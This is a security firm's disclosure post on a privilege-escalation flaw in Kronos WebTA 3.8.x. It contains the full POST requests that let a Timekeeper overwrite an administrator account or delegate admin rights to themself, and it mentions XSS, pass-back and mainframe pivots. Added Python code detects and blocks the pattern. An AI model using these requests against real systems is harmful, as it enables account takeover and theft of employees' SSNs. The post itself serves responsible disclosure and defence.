WebTA PrivEsc Vulnerability

Critical WebTA PrivEsc Vulnerability Discovery Details 

This blog covers a recent security vulnerability found by a team of Pen Testers at MindPoint Group during a customer engagement. We’ll walk through the issue description, the steps to reproduce the vulnerability, and our recommendations for remediation.

Common Vulnerabilities and Exposures (CVE) identifiers:

  • CVE-2020-8493 
  • CVE-2020-8494 
  • CVE-2020-8495 

Severity: 

  • Risk: High 
  • Difficulty to Exploit: Easy 

Vendor: 

Kronos Web Time and Attendance (WebTA) 

Versions Affected: 

Kronos WebTA 3.8.x and later 3.x versions before 4.0. The latest release of Kronos WebTA is not affected. 

Discovered By:  

Elwood Buck & Nolan Kennedy 

Summary: 

Authenticated remote privilege escalation vulnerability in Kronos WebTA v3.8.x affecting the “com.threeis.webta.H491delegate” servlet allows an attacker with Timekeeper or Supervisor privileges to gain unauthorized administrative privileges within the application. 

Issue Description: 

Privilege escalation occurs when a user gets access to more resources or functionality than they are normally allowed, and the application should have prevented such elevation or changes. A flaw in the application usually causes this. The result is that the user performs actions with more privileges than those intended by the developer or system administrator. 

Steps to Reproduce: 

While testing a timekeeping application, we noticed atypical behavior while manipulating the ‘add user’ function and ‘delegate’ feature. When you have the ability to add new users to an application, it’s worthwhile to check if it’s possible to jump into an elevated role.  

To exploit this vulnerability, you need to have the role of Timekeeper, Master Timekeeper, or HR Admin.  

[Screenshot: Timekeeper menu]

There are a few prerequisites before you can move into the administrator role: you will need an administrator username, the administrator's employee ID, a supervisor name, and to be the timekeeper for the administrator account that you will eventually take over. You can extract the administrator information with the following POST request:

POST /servlet/com.threeis.webta.H940searchUser HTTP/1.1 

selFunc=search&return_page=com.threeis.webta.P491delegate&return_variable=delegate&search_org=0&search_role=Administrator&actingRole=2&payload_name_0=selFunc&payload_val_0=search&payload_name_1=selRow&payload_name_2=delegate&payload_name_3=delegateRole&payload_val_3=2&payload_name_4=delegatorEmpId&payload_val_4=15667&payload_name_5=delegatorUserId&payload_val_5=username 

Similarly, to extract a supervisor name: 

POST /servlet/com.threeis.webta.H940searchUser HTTP/1.1 

selFunc=search&return_page=com.threeis.webta.P491delegate&return_variable=delegate&search_org=0&search_role=Supervisor&actingRole=2&payload_name_0=selFunc&payload_val_0=search&payload_name_1=selRow&payload_name_2=delegate&payload_name_3=delegateRole&payload_val_3=2&payload_name_4=delegatorEmpId&payload_val_4=15667&payload_name_5=delegatorUserId&payload_val_5=username 

To change the timekeeper: 

POST /servlet/com.threeis.webta.H408chgTkp HTTP/1.1 

selFunc=reassignTkp&uid=<ADMIN_USERNAME> 

Next, we create a new user, including a new username and password, and specify the “emp_id” value as the user id of our target administrator account. Once this request is complete, the original admin account will be overwritten. 

POST /servlet/com.threeis.webta.H402editUser HTTP/1.1 

selFunc=save&rganization=&_mobile_user=&emp_id=<ADMIN_ID_NUM>&ssnvalue=<RANDOM_SSN>&role_orig_tkp=&orig_tkp109=&role_orig_sup=&orig_sup103=&role_orig_mtkp=&orig_mtkp101=&orig_mtkp109=&role_orig_msup=&role_orig_hradmin=&orig_hradmin106=&orig_hradmin107=&userid=<NEW_ATTACKER_USERNAME>&pw1=<NEW_ATTACKER_PASSWORD>1&pw2=<NEW_ATTACKER_PASSWORD>&firstname=EVIL&midname=ADMIN&lastname=ADMIN&ssntext=352-11-1337&supervisor=<SUPERVISOR_USERNAME>&timekeeper=<ATTACKER>&organization=&payperiodcurrent=current&isactive=on

Log out and log in with the new credentials:

[Screenshot: Administrator menu]

A second technique uses the delegate feature to elevate to admin. To begin, you need to extract an administrator username and ID using the technique outlined above. With the username in hand, make a POST request. We tested different values in the “delegateRole” field to determine which number matched the administrator role:

POST /servlet/com.threeis.webta.H491delegate HTTP/1.1 

selFunc=add&selRow=&delegate=<ATTACKER>&delegateRole=5&delegatorEmpId=1234&delegatorUserId=<ADMIN> 

Log out, log back in, and you should be an Admin:

[Screenshot: Administrator menu]

As an Admin, you can extract any user’s PII to include names, addresses, and SSNs. If you are looking to use this as a pivot, you can embed XSS into the banner field that appears on every page of the application: 


We leveraged a pass-back attack (if you’re unfamiliar with a pass-back attack, check out our references at the end of this post) to extract the FTP account information that is used to offload data to an external FTP server.

The last but most significant ability we found as an admin was to manipulate the mainframe connected to the application. It was out of scope for our engagement, but you can run jobs on the connected mainframe and get code execution! Check out the mainframe post in the references. 

Application logic bugs can be difficult to find from a black box perspective, so make use of the parameter names and don’t be shy when trying to interpret or guess what different parameters might mean without knowing what functions they are passed to.  
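The request sequence above leaves a recognisable trail in application or proxy logs. The following detection logic is an added example (not WebTA code and not part of the original post) that replays the three servlet calls from a Timekeeper session against a small set of constructed log lines and flags the patterns a defender would care about: a timekeeper reassignment onto an administrator account, an editUser save whose emp_id already belongs to a different userid, and a delegation of the administrator role by a non-administrator or to the acting user themself. The log line format, the account directory, and the role names are assumptions; the value 5 for delegateRole is the one the post reports matching the administrator role.

```python
"""Audit-log detection for the WebTA request patterns described in this post.

Added example, not part of WebTA or of the original post. The log format is an
assumption: one request per line, space-separated as
  <timestamp> <actor userid> <actor role> <method> <servlet path> <url-encoded body>
The account directory and the log lines are constructed for the example.
"""
from urllib.parse import parse_qs

PRIVILEGED_ROLES = {"Administrator"}  # assumed name of the admin role
ADMIN_DELEGATE_ROLE = "5"             # value the post reports matched the admin role

# Constructed directory: userid -> employee id and role.
DIRECTORY = {
    "jadmin":   {"emp_id": "15667", "role": "Administrator"},
    "tkeeper1": {"emp_id": "20001", "role": "Timekeeper"},
    "sup1":     {"emp_id": "20002", "role": "Supervisor"},
}

# Constructed log lines: the post's sequence from a Timekeeper account, then two
# benign requests (an administrator delegating, and a new hire being created).
SAMPLE_LOG = """\
2019-09-10T10:01:02Z tkeeper1 Timekeeper POST /servlet/com.threeis.webta.H408chgTkp selFunc=reassignTkp&uid=jadmin
2019-09-10T10:02:15Z tkeeper1 Timekeeper POST /servlet/com.threeis.webta.H402editUser selFunc=save&emp_id=15667&userid=evil&pw1=x&pw2=x&timekeeper=tkeeper1
2019-09-10T10:05:44Z tkeeper1 Timekeeper POST /servlet/com.threeis.webta.H491delegate selFunc=add&selRow=&delegate=tkeeper1&delegateRole=5&delegatorEmpId=15667&delegatorUserId=jadmin
2019-09-10T11:00:00Z jadmin Administrator POST /servlet/com.threeis.webta.H491delegate selFunc=add&delegate=sup1&delegateRole=5&delegatorEmpId=15667&delegatorUserId=jadmin
2019-09-10T11:30:00Z tkeeper1 Timekeeper POST /servlet/com.threeis.webta.H402editUser selFunc=save&emp_id=30002&userid=newhire&pw1=x&pw2=x&timekeeper=tkeeper1
"""

def parse_line(line):
    """Split one log line into its fields and decode the request body."""
    ts, actor, role, method, path, body = line.split(" ", 5)
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return {"ts": ts, "actor": actor, "role": role, "method": method,
            "path": path, "servlet": path.rsplit(".", 1)[-1], "params": params}

def check_request(rec, directory=DIRECTORY):
    """Return the list of findings for one parsed request (empty when benign)."""
    p, findings = rec["params"], []
    emp_to_user = {v["emp_id"]: k for k, v in directory.items()}
    actor_privileged = rec["role"] in PRIVILEGED_ROLES
    if rec["servlet"] == "H408chgTkp" and p.get("selFunc") == "reassignTkp":
        # A non-admin making itself the timekeeper of an administrator account.
        target = directory.get(p.get("uid", ""), {})
        if target.get("role") in PRIVILEGED_ROLES and not actor_privileged:
            findings.append("timekeeper reassigned onto an administrator account")
    elif rec["servlet"] == "H402editUser" and p.get("selFunc") == "save":
        # A save whose emp_id is already owned by a different userid overwrites that account.
        owner = emp_to_user.get(p.get("emp_id", ""))
        if owner and owner != p.get("userid"):
            findings.append(f"emp_id already belongs to {owner} (account overwrite)")
    elif rec["servlet"] == "H491delegate" and p.get("selFunc") == "add":
        if p.get("delegateRole") == ADMIN_DELEGATE_ROLE and not actor_privileged:
            findings.append("administrator role delegated by a non-administrator")
        if p.get("delegate") == rec["actor"]:
            findings.append("actor delegated a role to themself")
    return findings

def scan(log_text, directory=DIRECTORY):
    """Run check_request over every line; return (timestamp, actor, servlet, finding) tuples."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        for finding in check_request(rec, directory):
            alerts.append((rec["ts"], rec["actor"], rec["servlet"], finding))
    return alerts

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(*alert, sep=" | ")
```

The checks deliberately compare the request against the actor's role as recorded by the server (the third log field) rather than the actingRole or delegateRole values in the body, since those are exactly the fields the attacker controls. The same logic can be lifted into a SIEM rule once the real log format is known.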

Recommendation: 

Follow OWASP’s guidance on broken access control and privilege escalation (see the references).
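Both escalation paths share one root cause: the server trusts role and identity values supplied in the request (actingRole, delegateRole, emp_id, delegatorUserId) instead of deriving them from the authenticated session. The model below is an added example, written in Python rather than as WebTA's Java servlet code, of the server-side checks that close both paths; the role names, the ROLE_RANK ordering and the Account/UserStore shapes are assumptions standing in for the application's real user model.

```python
"""Server-side authorization checks that close both escalation paths in this post.

Added example; this is not WebTA code. The role names, the ROLE_RANK ordering,
and the Account/UserStore shapes are assumptions standing in for the
application's real user model.
"""
from dataclasses import dataclass, field
from typing import Dict, Optional, Set

# Assumed privilege ordering; higher rank means more privilege.
ROLE_RANK = {"Employee": 0, "Timekeeper": 1, "Supervisor": 1,
             "Master Timekeeper": 2, "HR Admin": 3, "Administrator": 4}

class AuthorizationError(Exception):
    """The acting account is not allowed to perform this request."""

@dataclass
class Account:
    userid: str
    emp_id: int
    role: str
    timekeeper: Optional[str] = None
    delegated_roles: Set[str] = field(default_factory=set)

    def effective_rank(self) -> int:
        return max([ROLE_RANK[self.role]] + [ROLE_RANK[r] for r in self.delegated_roles])

class UserStore:
    def __init__(self, accounts):
        self.by_userid: Dict[str, Account] = {a.userid: a for a in accounts}

    def by_emp_id(self, emp_id: int) -> Optional[Account]:
        return next((a for a in self.by_userid.values() if a.emp_id == emp_id), None)

    def save_user(self, actor: Account, emp_id: int, userid: str, role: str,
                  timekeeper: str) -> Account:
        """Equivalent of the user 'save' function: the employee id must be unused
        or already belong to this userid (no overwriting another account), and
        the caller may only create accounts ranked below their own privilege."""
        owner = self.by_emp_id(emp_id)
        if owner is not None and owner.userid != userid:
            raise AuthorizationError(f"emp_id {emp_id} already belongs to {owner.userid}")
        if ROLE_RANK[role] >= actor.effective_rank():
            raise AuthorizationError("cannot create an account at or above your own privilege")
        acct = Account(userid, emp_id, role, timekeeper)
        self.by_userid[userid] = acct
        return acct

    def delegate(self, actor: Account, delegator_userid: str,
                 delegate_userid: str, role: str) -> Account:
        """Equivalent of the delegation 'add' function. The actor's identity and
        role come from the session object, never from request fields; only the
        delegator (or an administrator) may create the delegation, and the
        delegated role is capped at the delegator's own role."""
        if delegator_userid not in self.by_userid or delegate_userid not in self.by_userid:
            raise AuthorizationError("unknown delegator or delegate")
        if actor.userid != delegator_userid and actor.role != "Administrator":
            raise AuthorizationError("only the delegator or an administrator may add a delegation")
        delegator = self.by_userid[delegator_userid]
        if ROLE_RANK[role] > ROLE_RANK[delegator.role]:
            raise AuthorizationError("delegated role exceeds the delegator's own role")
        target = self.by_userid[delegate_userid]
        target.delegated_roles.add(role)
        return target

def is_allowed(fn, *args) -> bool:
    """Call a store method and report whether its authorization checks passed."""
    try:
        fn(*args)
        return True
    except AuthorizationError:
        return False

def replay_post_sequence() -> dict:
    """Replays the post's two request sequences from a Timekeeper session, then a
    legitimate delegation by the administrator; returns each outcome."""
    store = UserStore([Account("jadmin", 15667, "Administrator"),
                       Account("tkeeper1", 20001, "Timekeeper")])
    attacker, admin = store.by_userid["tkeeper1"], store.by_userid["jadmin"]
    return {
        # editUser save with the administrator's emp_id and a new userid
        "overwrite_admin": is_allowed(store.save_user, attacker, 15667, "evil", "Administrator", "tkeeper1"),
        # delegation naming the administrator as delegator and the admin role
        "delegate_admin": is_allowed(store.delegate, attacker, "jadmin", "tkeeper1", "Administrator"),
        # ordinary use by the real administrator is unaffected
        "legit_delegation": is_allowed(store.delegate, admin, "jadmin", "tkeeper1", "Master Timekeeper"),
        "attacker_rank": attacker.effective_rank(),
    }

if __name__ == "__main__":
    print(replay_post_sequence())
```

The two properties worth carrying into any fix are that identifiers which establish ownership (emp_id, the delegator) are validated against the server's own records before they are honoured, and that a request can never confer more privilege than the session that made it already holds.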

References: 

How to Hack Through a Pass-Back Attack

http://www.nolanbkennedy.com/post/privilege-escalation-in-kronos-web-time-and-attendance-webta

https://www.exploit-db.com/exploits/48001

https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control

https://media.blackhat.com/us-13/US-13-Young-Mainframes-The-Past-Will-Come-Back-to-Haunt-You-WP.pdf

Timeline: 

9/16/2019 – Vendor notified 

9/23/2019 – Patch released and fixes verified 

10/29/2019 – Vendor notified of intent to publicly disclose 

11/4/2019 – Vendor requests modifications to public disclosure content 

Our Pen Testing Services 

The vulnerability listed above was an unknown vulnerability, found during one of our pen testing engagements. MindPoint Group offers a variety of Security Operations services (like pen testing) to help your organization identify and mitigate risk and defend against ever-growing threats. Contact us to learn more.    

Elwood Buck